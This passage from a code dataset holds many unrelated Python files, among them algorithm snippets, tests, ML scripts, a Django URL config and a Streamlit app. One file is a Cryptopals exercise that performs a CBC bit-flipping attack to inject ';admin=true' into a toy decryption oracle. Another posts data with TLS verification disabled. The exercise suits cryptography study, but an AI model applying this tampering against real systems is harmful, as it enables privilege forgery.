:param mean: Decimal mean with one digit more\r\n    :param roundedU: Decimal rounded u with only 1 effective digit\r\n    :return:\r\n    \"\"\"\r\n    return mean.quantize(roundedU, ROUND_HALF_EVEN)\r\n","repo_name":"DezhengLee/Labster","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":12900,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"19496898694","text":"import os\nimport sys\n\ndef dfs_topological_sort(arr, n):\n    \"\"\" Topological sort with DFS. Return an empty list if\n    there is a cycle.\n    \"\"\"\n    graph = [[] for _ in range(n)]\n    for u, v in arr:\n        graph[u].append(v)\n\n    visited, stack = [0] * n, []\n\n    def dfs(u):\n        if visited[u] == -1:\n            return False\n        if visited[u] == 1:\n            return True\n\n        visited[u] = -1\n        for v in graph[u]:\n            if not dfs(v):\n                return False\n        stack.append(u)\n        visited[u] = 1\n        return True\n\n    for u in range(n):\n        if not dfs(u):\n            return []\n    return stack[::-1]\n\n\narr = [[0, 3], [1, 2], [2, 3], [3, 4], [2, 4], [2, 5], [3, 5], [1, 3], [4, 5]]\ns = dfs_topological_sort(arr, 6)\nprint(s)\n","repo_name":"GaoangLiu/GaoangLiu.github.io","sub_path":"codes/sort/dfs_topological_sort.py","file_name":"dfs_topological_sort.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5977394541","text":"import sys\nimport os\nfrom create_video_from_slides import combine_with_mp3, pics_to_video_from_config\n\nfrom pptx_notes_to_ssml import pptx_to_notes_str\nfrom text_to_ssml import text_to_ssml\nfrom text_to_speech_azure import speech_synthesis_bookmark_event\n\n\n\ndef run_full_program(file_location: str, img_location: str, voice: str):\n    if file_location.endswith('.pptx'):\n        notes_text = pptx_to_notes_str(file_location)\n    else:\n        with open(file_location, 'r') as f:\n            notes_text = f.read()\n    print(\"got notes text\", notes_text)\n    ssml_text = text_to_ssml(notes_text, voice=voice)\n    print(\"constructed ssml text\", ssml_text)\n    mp3_location = 'out/audio_full.mp3'\n    result = speech_synthesis_bookmark_event(ssml_text, mp3_location)\n    bookmarks = result.bookmarks\n    print(\"got bookmarks\", bookmarks, \"and mp3\", mp3_location)\n    # skip hidden files like .DS_Store\n    files = sorted([x for x in os.listdir(img_location) if not x.startswith('.')])\n    if len(files) != len(bookmarks):\n        raise Exception(f'Number of images and number of bookmarks do not match slides {len(files)} and bookmarks {len(bookmarks)}')\n    images_config = []\n\n    prev_offset = 0\n    for i, bookmark in enumerate(sorted(bookmarks, key=lambda x: x['offset'])):\n        images_config.append({\n            'file': os.path.join(img_location, files[i]),\n            'duration': str(int(bookmark['offset'] - prev_offset)) + \"ms\"\n        })\n        prev_offset = bookmark['offset']\n    print(\"constructed config\", images_config)\n    video_with_slides = 'out/video_with_slides.mp4'\n    pics_to_video_from_config(images_config, out_video=video_with_slides)\n    print(\"got video with slides\", video_with_slides)\n    final_video_path = 'out/full_video_with_audio.mp4'\n    combine_with_mp3(video_with_slides, mp3_location, final_video_path)\n    print(\"got final video with audio\", final_video_path)\n\n\nif __name__ == '__main__':\n    ppt_location = sys.argv[1]\n    img_location = sys.argv[2]\n    if len(sys.argv) > 3:\n        voice = sys.argv[3]\n    else:\n        voice = 'en-US-JennyNeural'\n    run_full_program(ppt_location, img_location, 
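The dfs_topological_sort record above doubles as a cheap cycle check, since it returns [] whenever a back edge is found (with the cycle branch returning False, as fixed above). Expected behaviour on two tiny graphs, assuming the function as defined in that record:

    print(dfs_topological_sort([[0, 1], [1, 2]], 3))  # a valid order, e.g. [0, 1, 2]
    print(dfs_topological_sort([[0, 1], [1, 0]], 2))  # [] -- cycle detected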
voice)\n","repo_name":"romaninozemtsev/slides-to-video","sub_path":"src/overall_script.py","file_name":"overall_script.py","file_ext":"py","file_size_in_byte":2144,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72194488565","text":"import data_strings\n\n\ndef test_positive_one_insert(db_start_close):\n    db = db_start_close\n    db.execute(\"INSERT INTO client VALUES(?, ?, ?)\", data_strings.P_DATA)\n    db.commit()\n    result = db.execute('SELECT * FROM client').fetchall()\n    assert result[-1] == data_strings.P_DATA\n\n\ndef test_positive_multi_insert(db_start_close):\n    db = db_start_close\n    db.executemany(\"INSERT INTO client VALUES(?, ?, ?)\", data_strings.P_MULTI_DATA)\n    db.commit()\n    result = db.execute('select * from client').fetchall()\n    for item in data_strings.P_MULTI_DATA:\n        assert item in result\n\n\ndef test_positive_one_update(db_start_close):\n    db = db_start_close\n    db.execute(\"\"\"UPDATE client SET Name = \"Holy Molly\" where Name = \"Mark\"\n    \"\"\")\n    db.commit()\n    result = db.execute('SELECT Name FROM client where Name = \"Holy Molly\"').fetchone()\n    assert result[0] == \"Holy Molly\"\n\n\ndef test_positive_one_delete(db_start_close):\n    db = db_start_close\n    db.execute(\"\"\"DELETE FROM client WHERE Id = 3\n    \"\"\")\n    db.commit()\n    result = db.execute('SELECT * FROM client').fetchall()\n    assert len(result) == 2\n\n# Not writing negative tests, because for now I don't really understand how assert\n# works with empty rows in the DB\n","repo_name":"framber/bee_sqlite","sub_path":"tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"74065132726","text":"import numpy as np\nimport cv2\nimport torch\nimport types\nimport PIL\n\nclass Compose(object):\n    \"\"\" Composes several co_transforms together.\n    For example:\n    >>> co_transforms.Compose([\n    >>> co_transforms.CenterCrop(10),\n    >>> co_transforms.ToTensor(),\n    >>> ])\n    \"\"\"\n\n    def __init__(self, t):\n        self.co_transforms = t\n\n    def extend(self, t):\n        self.co_transforms.extend(t)\n\n    def insert(self, index, t):\n        self.co_transforms.insert(index, t)\n\n    def write_img(self, img=[], ch_num=-1, name='', en=False):\n        if en == False:\n            return\n        #name = './data/checkpoints/tiad_interest_pt_descriptor/debug/{:02d}.jpg'.format(aug_idx)\n        scale_range = 255.0 / np.max(img)\n        img = np.clip(img * scale_range, 0.0, 255.0)\n        img = np.asarray(img, 'uint8')\n\n        non_zero_el = cv2.countNonZero(img)\n\n        print(\"non zero element: {}\".format(non_zero_el))\n        cv2.imwrite('{}_nz{}.jpg'.format(name, non_zero_el), img)\n\n    def __call__(self, input, target):\n        if self.co_transforms:\n            for aug_idx, t in enumerate(self.co_transforms):\n                if t:\n                    input,target = t(input,target)\n\n        return input,target\n\n\n\nclass Bypass(object):\n    def __init__(self):\n        pass\n\n    def __call__(self, images, targets):\n        return images,targets\n\n\nclass Lambda(object):\n    \"\"\"Applies a lambda as a transform\"\"\"\n\n    def __init__(self, lambd):\n        assert isinstance(lambd, types.LambdaType)\n        self.lambd = lambd\n\n    def __call__(self, input,target):\n        return self.lambd(input,target)\n\n\nclass ImageTransformUtils(object):\n    @staticmethod\n    def apply_to_list(func, inputs, *args, **kwargs):\n        for img_idx in range(len(inputs)):\n            inputs[img_idx] = func(inputs[img_idx], img_idx, *args, **kwargs)\n\n        return inputs\n\n    @staticmethod\n    def apply_to_lists(func, images, targets, *args, **kwargs):\n        for img_idx in 
range(len(images)):\n images[img_idx], targets[img_idx] = func(images[img_idx], targets[img_idx], img_idx, *args, **kwargs)\n\n return images, targets\n\n @staticmethod\n def crop(img, r, c, h, w):\n img = img[r:(r+h), c:(c+w),...] if (len(img.shape)>2) else img[r:(r+h), c:(c+w)]\n return img\n\n @staticmethod\n def resize_fast(img, output_size_rc, interpolation=-1):\n in_h, in_w = img.shape[:2]\n out_h, out_w = output_size_rc\n if interpolation<0:\n interpolation = cv2.INTER_AREA if ((out_h= abs(self.vx):\n self.vx = 0\n elif self.vx >= 0:\n self.vx -= 6 * dt\n else:\n self.vx += 6 * dt\n if self.vy != 0:\n if 6 * dt >= abs(self.vy):\n self.vy = 0\n elif self.vy >= 0:\n self.vy -= 6 * dt\n else:\n self.vy += 6 * dt\n\n def collusion(self, level_mask, ball_mask, trap_mask, x, y):\n \"\"\"\n Check collusion ball with walls and traps\n :param level_mask: mask with level walls\n :param ball_mask: mask with ball\n :param trap_mask: mask with level traps\n :param x: start ball x position\n :param y: start ball y position\n \"\"\"\n overlap_walls_x = level_mask.overlap(ball_mask, (self.x + self.vx - 0, self.y - 0))\n overlap_walls_y = level_mask.overlap(ball_mask, (self.x - 0, self.y + self.vy - 0))\n overlap_traps = trap_mask.overlap(ball_mask, (self.x + self.vx - 0, self.y + self.vy - 0))\n if overlap_walls_x:\n self.vx = -self.vx\n self.hit = True\n if overlap_walls_y:\n self.hit = True\n self.vy = -self.vy\n self.x += self.vx\n self.y += self.vy\n if overlap_traps:\n self.x = x\n self.y = y\n self.vx = 0\n self.vy = 0\n self.ax = 0\n self.ay = 0\n\n def finish(self, ball_mask, finish_mask, obj, x_finish, y_finish, running):\n \"\"\"\n Check collusion ball with finish\n :param ball_mask: mask with ball\n :param finish_mask: mask with finish\n :param obj: object in class menu\n :param x_finish: x coordinate of finish surface\n :param y_finish: y coordinate of finish surface\n :param running: flag, that end level\n :return: running\n \"\"\"\n overlap_finish = finish_mask.overlap(ball_mask, (x_finish - self.x + self.vx, y_finish - self.y + self.vy))\n if overlap_finish:\n running = False\n obj.menu_live = 1\n obj.intermediate_menu = 1\n if obj.level_1:\n coord_of_start[0] = [90, 80]\n elif obj.level_2:\n coord_of_start[1] = [100, 80]\n elif obj.level_3:\n coord_of_start[2] = [1250, 75]\n elif obj.level_4:\n coord_of_start[3] = [100, 360]\n obj.intermediate_menu = 0\n obj.home_surface = 1\n return running\n","repo_name":"ArturSadykov2/Project_labirint","sub_path":"game_objects/game_objects_ball.py","file_name":"game_objects_ball.py","file_ext":"py","file_size_in_byte":4158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"30575518429","text":"from os import XATTR_SIZE_MAX\nimport torch \nimport torch.nn as nn\nimport scipy.io as sp\nimport sklearn.metrics\nimport numpy as np\nimport sys\nimport matplotlib.pyplot as plt\n\ndef plot_data(X, Y):\n\n data_x_class_pos = []\n data_y_class_pos = []\n data_x_class_neg = []\n data_y_class_neg = []\n\n for i in range(0, len(X)):\n if Y[i] == -1:\n data_x_class_pos.append(X[i][0]) \n data_y_class_pos.append(X[i][1])\n else:\n data_x_class_neg.append(X[i][0]) \n data_y_class_neg.append(X[i][1])\n\n plt.scatter(data_x_class_pos, data_y_class_pos, color='orange')\n plt.scatter(data_x_class_neg, data_y_class_neg, color='blue')\n plt.show()\n\ndef converge_to_binary(x):\n x = np.where(x < .5, -1, 1)\n return x\n\ndef converge_to_prob(x):\n x = np.where(x < 0., 0., 1.)\n return x\n\ndata = 
sp.loadmat(\"hw04_dataset.mat\")\n\n# print(data)\n\nX = data[\"X_trn\"]\nY = data[\"y_trn\"]\n\n# print(X)\n\nX_test = data[\"X_tst\"]\nY_test = data[\"y_tst\"]\n\n# Defining input size, hidden layer size, output size and batch size respectively\nn_in, n_h, n_out, hidden_layers, activation_function = 2, 50, 1, 2, 'relu'\n\nx = torch.tensor(X).float()\ny = torch.tensor(Y).float()\n\nx_test = torch.tensor(X_test).float()\ny_test = torch.tensor(Y_test).float()\n\n\nclass MyModule(nn.Module):\n    def __init__(self, n_in, neurons_per_hidden, n_out, hidden_layers, activation_function):\n        super(MyModule, self).__init__()\n\n        self.n_in = n_in\n        self.n_h = neurons_per_hidden\n        self.n_out = n_out\n        self.h_l = hidden_layers\n\n        self.a_f = activation_function\n\n        # Inputs to hidden layer linear transformation\n        self.input = nn.Linear(n_in, self.n_h)\n        # Defaults to ReLU if activation_function is improperly specified\n        self.activation_layer = nn.ReLU()\n\n        if activation_function == 'relu':\n            self.activation_layer = nn.ReLU()\n        elif activation_function == 'tanh':\n            self.activation_layer = nn.Tanh()\n        elif activation_function == 'sigmoid':\n            self.activation_layer = nn.Sigmoid()\n        elif activation_function == 'identity':\n            self.activation_layer = nn.Identity()\n        else:\n            print(\"Invalid activation function specified\")\n            sys.exit(1)\n\n        self.linears = nn.ModuleList([nn.Linear(self.n_h, self.n_h) for i in range(self.h_l - 1)])\n        self.activation_layers = nn.ModuleList([self.activation_layer for i in range(self.h_l - 1)])\n        \n        # Output layer with n_out units\n        self.output = nn.Linear(self.n_h, n_out)\n        # Define sigmoid output\n        self.sigmoid = nn.Sigmoid()\n\n    def forward(self, x):\n\n        x = self.input(x)\n        x = self.activation_layer(x)\n\n        # ModuleList can act as an iterable, or be indexed using ints\n        for i, l in enumerate(self.linears):\n            x = self.linears[i // 2](x) + l(x)\n            x = self.activation_layers[i // 2](x) + l(x)\n\n        x = self.output(x)\n        x = self.sigmoid(x)\n\n        return x\n\nmodel = nn.Sequential(MyModule(n_in, n_h, n_out, hidden_layers, activation_function))\n# print(model)\n\n# Construct the loss function\ncriterion = torch.nn.BCELoss()\n# Construct the optimizer (Adam in this case)\noptimizer = torch.optim.Adam(model.parameters(), lr = 0.05)\n\n# Optimization\nfor epoch in range(50):\n    # Forward pass: Compute predicted y by passing x to the model\n    y_pred = model(x)\n\n    y_pred_numpy = y_pred.detach().numpy()\n    y_pred_tanh_range = converge_to_binary(y_pred_numpy)\n    y_numpy = y.detach().numpy()\n    y_sigmoid_range = converge_to_prob(y_numpy)\n\n# print(sklearn.metrics.accuracy_score(y_pred_tanh_range, y))\n\n    # Compute and print loss\n    loss = criterion(y_pred, torch.tensor(y_sigmoid_range).float())\n# print('epoch: ', epoch,' loss: ', loss.item())\n\n    # Zero gradients, perform a backward pass, and update the weights.\n    optimizer.zero_grad()\n\n    # perform a backward pass (backpropagation)\n    loss.backward()\n\n    # Update the parameters\n    optimizer.step()\n\n# Plotting training data\n# plot_data(X, Y)\n\n# Printing all weights and biases from NN\n\nprint(\"All of the weights and biases from all layers in model\")\n\nfor i in model.named_modules():\n    print(i[0])\n\n    for j in i[1].state_dict().items():\n        print(j)\n\ny_pred_tanh_range_from_train = y_pred_tanh_range\n\ny_pred = model(x_test)\ny_pred_numpy = y_pred.detach().numpy()\ny_pred_tanh_range = converge_to_binary(y_pred_numpy)\n\nprint(\"Results of last activation layer\")\nprint(y_pred)\n\nprint(\"Training 
Accuracy\")\nprint(sklearn.metrics.accuracy_score(y_pred_tanh_range_from_train, y))\n\nprint(\"Testing Accuracy\")\nprint(sklearn.metrics.accuracy_score(y_pred_tanh_range, y_test))\n\n# Plotting the test data\n# plot_data(x_test, y_pred_tanh_range)\n\n","repo_name":"ShaanHossain/DS4400HW3","sub_path":"ds4400_hossain_script.py","file_name":"ds4400_hossain_script.py","file_ext":"py","file_size_in_byte":4803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72533637045","text":"import os\nimport sys\nimport json\nimport requests\nimport argparse\n\n##############################\n# post_stix\n# STIX registration\n##############################\n# 1st argument: URL\n# 2nd argument: username\n# 3rd argument: apikey\n# 4th argument: community_name\n# 5th argument: attachment\n##############################\n# Options\n# -p package name\n##############################\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser(description='Post STIX Script')\n    parser.add_argument('-p', '--package_name', help='package name(option)')\n    parser.add_argument('url', help='url')\n    parser.add_argument('user_name', help='user name')\n    parser.add_argument('apikey', help='apikey')\n    parser.add_argument('community_name', help='community name')\n    parser.add_argument('attachments', help='attachments file')\n    args = parser.parse_args()\n\n    # Authentication info\n    headers = {\n        'username': args.user_name,\n        'apikey': args.apikey,\n    }\n\n    # Upload info\n    data = {\n        'community_name': args.community_name\n    }\n    if args.package_name is not None:\n        data['package_name'] = args.package_name\n\n    # File upload\n    files = {}\n    files['stix'] = open(args.attachments)\n\n    # Send the request\n    r = requests.post(\n        args.url,\n        headers=headers,\n        data=data,\n        files=files,\n        verify=False)\n\n    # Parse the response\n    b = json.loads(r.text)\n    if r.status_code != 201:\n        print('Request Failed (%s, %s).' 
% (r.status_code, b['userMessage']))\n        sys.exit(os.EX_UNAVAILABLE)\n    else:\n        print('Success!')\n        sys.exit(os.EX_OK)\n","repo_name":"s-tip/stip-rs","sub_path":"bin/post_stix.py","file_name":"post_stix.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"ja","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"32318321014","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed May 23 10:47:00 2018\r\n\r\n@author: Administrator\r\n\"\"\"\r\n\r\n# =============================================================================\r\n# 3.2 Working with a single worksheet\r\n# =============================================================================\r\n#3.2.1 Reading and writing Excel files\r\n#Base Python with the xlrd and xlwt modules\r\n\r\n#Import the open_workbook function from the xlrd module and the Workbook object from the xlwt module\r\nimport sys\r\nfrom xlrd import open_workbook\r\nfrom xlwt import Workbook\r\n\r\ninput_file = sys.argv[1]\r\noutput_file = sys.argv[2]\r\n\r\n#Instantiate an xlwt Workbook object so results can be written to the \"output\" Excel file (workbook)\r\noutput_workbook = Workbook()\r\n#Use xlwt's add_sheet function to add a worksheet named jan_2013_output to the \"output\" workbook\r\noutput_worksheet = output_workbook.add_sheet('jan_2013_output')\r\n\r\n#Use xlrd's open_workbook function to open the \"input\" workbook and assign the result to a workbook object\r\nwith open_workbook(input_file) as workbook:\r\n    \r\n#    Use this workbook object's sheet_by_name function to reference the worksheet named january_2013\r\n    worksheet = workbook.sheet_by_name('january_2013')\r\n    \r\n#    Create for loops over the row and column index values, using the range function and the worksheet\r\n#    object's nrows and ncols attributes to iterate over every row and column of the worksheet.\r\n    for row_index in range(worksheet.nrows):\r\n        for column_index in range(worksheet.ncols):\r\n            \r\n#            Use xlwt's write function with the row and column indexes to write each cell value to the output file's worksheet.\r\n            output_worksheet.write(row_index, column_index, \\\r\n                                   worksheet.cell_value(row_index, column_index))\r\n\r\n#Save and close the output workbook\r\noutput_workbook.save(output_file)\r\n    \r\n","repo_name":"lilyan0624/MyProject","sub_path":"EbookStudy/Basic Python for Data Analysis/chapter3/2excel_parsing_and_write.py","file_name":"2excel_parsing_and_write.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15032052833","text":"import pandas as pd\nfrom pandas import ExcelFile\n\n\ndef attendance():\n\n    \"\"\"\n\n    Method created to store the roster of all people in a single list.\n    Reads the Excel file, stores each entry as a string of the form {application id}+{name}, and returns the list of all people.\n\n    \"\"\"\n    intervieweeList = []\n    df = pd.read_excel(r'availability_file.xlsx')\n\n    for index,row in df.iterrows():\n        nameId = ''\n        nameId += str(row[0])\n        nameId += str(row[1])\n        intervieweeList.append(nameId) \n\n    return intervieweeList\n\n\nif __name__ == \"__main__\":\n\tattendance()","repo_name":"jenny5546/Interview-Automatic-Scheduler","sub_path":"namelist.py","file_name":"namelist.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5577738406","text":"from django.contrib.sitemaps.views import sitemap\nfrom django.contrib.staticfiles.storage import staticfiles_storage\nfrom django.urls import path\nfrom django.views.generic import RedirectView\n\nfrom main.sitemaps import blog_dict, StaticViewSitemap, project_dict\nfrom django.contrib.sitemaps import GenericSitemap\n\n\nfrom main.views import IndexView, ProjectsView, AboutView, ProjectDetailView, BlogView, BlogDetailView\n\nsitemaps = {\n    'blog': GenericSitemap(blog_dict, priority=0.5),\n    'projects': GenericSitemap(project_dict, priority=0.5),\n    'static': StaticViewSitemap,\n}\n\nurlpatterns = [\n    path('', IndexView.as_view(), name='index'),\n    path('projects/', 
ProjectsView.as_view(), name='projects'),\n    path('projects/', ProjectDetailView.as_view(), name='project details'),\n    path('blog/', BlogView.as_view(), name='blog'),\n    path('blog/', BlogDetailView.as_view(), name='blog post details'),\n    path('about/', AboutView.as_view(), name='about'),\n    path('sitemap.xml', sitemap, {'sitemaps': sitemaps},\n         name='django.contrib.sitemaps.views.sitemap'),\n    path(\n        \"favicon.ico\",\n        RedirectView.as_view(url=staticfiles_storage.url(\"favicon.ico\")),\n    ),\n]\n\n","repo_name":"DimoDimchev/Personal-Website","sub_path":"main/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"40385859666","text":"from urllib import parse\nfrom util import aes_helper, padding\n\n\ndef getCiphertext(userdata, encryptor):\n    userdata = parse.quote(userdata)\n    message = (\n        b\"comment1=cooking%20MCs;userdata=\"\n        + bytes(userdata, \"ascii\")\n        + b\";comment2=%20like%20a%20pound%20of%20bacon\"\n    )\n    message = padding.pkcs7Pad(message)\n    return encryptor.update(message) + encryptor.finalize()\n\n\ndef isAdmin(ciphertext, decryptor):\n    message = decryptor.update(ciphertext) + decryptor.finalize()\n    message = padding.pkcs7Strip(message)\n    print(message)\n    return b\";admin=true;\" in message\n\n\ndef editCiphertext(userdata, ciphertext):\n    ciphertext = bytearray(ciphertext)\n    for i, u in zip(range(16), b\";admin=true\"):\n        ciphertext[i + 16] = ciphertext[i + 16] ^ userdata[i] ^ u\n    return bytes(ciphertext)\n\n\n# Garbled block doesn't parse nicely into ascii.\n# I am able to inject the target into the plaintext by manipulating the ciphertext though.\nif __name__ == \"__main__\":\n    cipher = aes_helper.getCBCCipher()\n    userdata = b\"1\" * 11\n    ct = getCiphertext(userdata, cipher.encryptor())\n    print(isAdmin(ct, cipher.decryptor()))\n    ct = editCiphertext(userdata, ct)\n    print(isAdmin(ct, cipher.decryptor()))\n","repo_name":"jessetham/cryptopals","sub_path":"s2c16.py","file_name":"s2c16.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"15079700731","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time    : 2019/10/30 9:07\n# @Author  : mrwuzs\n# @Site    :\n# @File    : test_14_delete_tenant_user.py\n# @Software: PyCharm\nimport pytest\nimport allure\n\nfrom public.common.publicfunction import *\nfrom public.common import datainfo\nfrom public.appmodel import useraction\nfrom public.pages import authUserPage\nfrom public.appmodel.loginaction import Login\n\n\n@allure.feature(\"User management\")\nclass TestDeleteUser():\n    \"\"\"Tests for deleting a user under an operations department\"\"\"\n\n    @allure.story(\"Delete a user under an operations department\")\n    @pytest.mark.flaky(reruns=globalparam.RENUM)\n    def test_delete_tenant_user(self,login_domain):\n        dr = login_domain\n        data1s = datainfo.get_xls_to_dict(\"user.xlsx\", \"authuser\")[\"创建运营部门用户\"]\n        aupg = authUserPage.AuthUsertPage(dr)\n        ta = useraction.UserAction(dr)\n        ta.delete_tenant_user(data1s[\"username\"])\n        aupg.open_authuser()\n\n        aupg.input_select_user(data1s[\"username\"])\n        dr.wait(5)\n        add_image(dr,\"Delete a user under an operations department\")\n        flag = dr.element_exist(\"xpath->//td\")\n        assert flag is False\n\nif __name__ == \"__main__\":\n    pytest.main([\"-s\", 
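The editCiphertext trick in the s2c16 record above relies on a pure XOR identity: in CBC, each decrypted plaintext byte is p = D(c) XOR prev, so XORing the previous block's ciphertext byte with (p XOR p') turns the recovered byte into p'. The identity in isolation (toy numbers standing in for the block cipher, no real AES involved):

    p, p_new, mask = ord("1"), ord(";"), 0xA7  # mask stands in for D(c)
    prev = mask ^ p                            # previous-block byte that decrypts to p
    prev_edited = prev ^ p ^ p_new
    assert mask ^ prev_edited == p_new         # the byte now decrypts to ';'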
\"test_14_delete_tenant_user.py\"])\n","repo_name":"woozs/ui_auto_test","sub_path":"testcase/test_14_delete_tenant_user.py","file_name":"test_14_delete_tenant_user.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"72024679606","text":"# Analyze the data\nimport cv2\nimport os\n\nsize = []\n\ndef read_img(img_path):\n\n    max_height = 0\n    max_width =0\n\n    files = os.listdir(r'./'+img_path)\n    files.sort(key=lambda x: int(x[:-4]))\n\n    for filename in files:\n        img = cv2.imread(img_path + '/' + filename)\n        shape = img.shape\n        size.append(shape)\n\n        height = shape[0]\n        width = shape[1]\n        if height >= max_height:\n            max_height = height\n\n        if width >= max_width:\n            max_width = width\n\n        with open(\"train_img_info.txt\", \"a+\") as f: # open the file for appending, creating it if it does not exist\n            f.write(str(filename)) # write the file name\n            f.write(\" \") # write a space\n            f.write(str(height)) # write the height\n            f.write(\" \") # write a space\n            f.write(str(width)) # write the width\n            f.write(\"\\n\") # write a newline\n\n    with open(\"train_img_info.txt\", \"a+\") as f:\n        f.write(\"max_height: \")\n        f.write(str(max_height))\n        f.write(\"max_width: \")\n        f.write(str(max_width))\n\n    print(\"max height:\", max_height, \"max width:\", max_width)\n\nif __name__==\"__main__\":\n    path1 = 'data/train/calling_images'\n    path2 = 'data/train/normal_images'\n    path3 = 'data/train/smoking_images'\n\n    read_img(path1)\n    read_img(path2)\n    read_img(path3)\n\n\n\n\n\n\n","repo_name":"CreatSSR/PyTorch_demo","sub_path":"demo_pic_info.py","file_name":"demo_pic_info.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5006342135","text":"import streamlit as st\nimport pandas as pd\nfrom guest_crud import view_listing\n\ndef view_host_listings(connection):\n    with connection.cursor() as cursor:\n        # Retrieve the listings created by the current user from Listings table\n        sql = \"SELECT * FROM Listings WHERE host_id = %s\"\n        cursor.execute(sql, (st.session_state.user_id,))\n        listings = cursor.fetchall()\n\n    if listings:\n        # # Define number of items to display per page\n        # items_per_page = st.slider(\"Items per page\", min_value=1, max_value=20, value=10)\n        # # Determine number of pages\n        # num_pages = len(listings) // items_per_page + (len(listings) % items_per_page > 0)\n        # # Add pagination\n        # page = st.number_input(\"Page\", min_value=1, max_value=num_pages, value=1)\n        # start_idx = (page - 1) * items_per_page\n        # end_idx = start_idx + items_per_page\n        # listings_page = listings[start_idx:end_idx]\n        # # Display listings in a table\n        # st.table(listings_page)\n        if listings:\n            st.markdown(\"
<h3>Available Listings</h3>
\", unsafe_allow_html=True)\n # Add search bar for filtering listings by name, location, or other details\n search_term = st.text_input(\"Search listings:\")\n if search_term:\n listings = [listing for listing in listings if search_term.lower() in str(listing).lower()]\n\n listings_df = pd.DataFrame(listings)\n cols_rename = [' '.join(c.capitalize().split('_')) for c in listings_df.columns]\n listings_df.columns = cols_rename\n\n cols = st.columns((1,4,2,3,3,2))\n fields = [\"No.\",\"Name\",\"Price\",\"Minimum Nights\",\"Maximum Nights\",\" \"]\n for col, field_name in zip(cols, fields):\n col.write(field_name)\n \n for idx in listings_df.index:\n col1, col2, col3, col4,col5,col6 = st.columns((1,4,2,3,3,2))\n col1.write(idx+1)\n col2.write(listings_df['Name'][idx])\n col3.write(listings_df['Price'][idx])\n col4.write(listings_df['Minimum nights'][idx])\n col5.write(listings_df['Maximum nights'][idx])\n view_button = col6.empty()\n action = view_button.button(\"View\", key=idx)\n \n if action:\n view_listing(listings_df.loc[idx])\n\n else:\n st.markdown(\"
<h3>You have no listings!</h3>
\", unsafe_allow_html=True)\n\ndef create_host_listings(connection):\n listing_name = st.text_input(\"Listing Name\", value=\"\")\n listing_price = st.number_input(\"Price per night\", value = 0.0)\n listing_latitude = st.number_input(\"Latitude\", format=\"%.5f\")\n listing_longitude = st.number_input(\"Longitude\", format=\"%.5f\")\n listing_min_nights = st.number_input(\"Minimum Nights\", value=0)\n listing_max_nights = st.number_input(\"Maximum Nights\", value=0)\n listing_desc = st.text_input(\"Description\")\n listing_occupancy = st.number_input(\"Maximum Occupancy\", value=0)\n listing_bedrooms = st.number_input(\"Bedrooms\", value=0)\n listing_bathrooms = st.number_input(\"Bathrooms\", value=0)\n listing_license = st.text_input(\"License\")\n listing_has_availability = st.checkbox(\"Has Availability\")\n with connection.cursor() as cursor:\n # Query all neighbourhood names from the database\n sql = \"SELECT neighbourhood_id, name FROM Neighbourhoods\"\n cursor.execute(sql)\n neighbourhoods = cursor.fetchall()\n neighbourhood_names = [neighbourhood['name'] for neighbourhood in neighbourhoods]\n\n # Retrieve all property type names from PropertyTypes table\n cursor.execute(\"SELECT property_type_name FROM PropertyTypes\")\n property_types = cursor.fetchall()\n property_type_names = [pt['property_type_name'] for pt in property_types]\n\n # Retrieve all room type names from RoomTypes table\n cursor.execute(\"SELECT room_type_name FROM RoomTypes\")\n room_type_names = [row[\"room_type_name\"] for row in cursor.fetchall()]\n\n # Create the neighbourhood dropdown\n listing_neighbourhood_name = st.selectbox(\"Neighbourhood\", neighbourhood_names)\n listing_neighbourhood_id = next(neighbourhood['neighbourhood_id'] for neighbourhood in neighbourhoods \n if neighbourhood['name'] == listing_neighbourhood_name)\n listing_property_type_name = st.selectbox(\"Property Type\", property_type_names)\n listing_room_type_name = st.selectbox(\"Room Type\", room_type_names)\n\n listing_amenities = st.text_input(\"Amenities\")\n\n if st.button(\"Create\"):\n if listing_name.strip() == \"\":\n st.write(\"Listing name cannot be empty!\")\n elif listing_license.strip() == \"\":\n st.write(\"License is needed!\")\n else:\n with connection.cursor() as cursor:\n # Check if listing with same name already exists for this user\n sql = \"SELECT COUNT(*) FROM Listings WHERE name = %s AND host_id = %s\"\n cursor.execute(sql, (listing_name, st.session_state.user_id))\n result = cursor.fetchone()\n if result[\"COUNT(*)\"] > 0:\n st.write(\"A listing with the same name already exists for this user.\")\n else:\n sql = \"INSERT INTO Listings (name, price, latitude, longitude, minimum_nights, maximum_nights, description, occupancy, bedrooms, bathrooms, license, has_availability, host_id, neighbourhood_id, property_type_name, room_type_name, amenities) VALUES 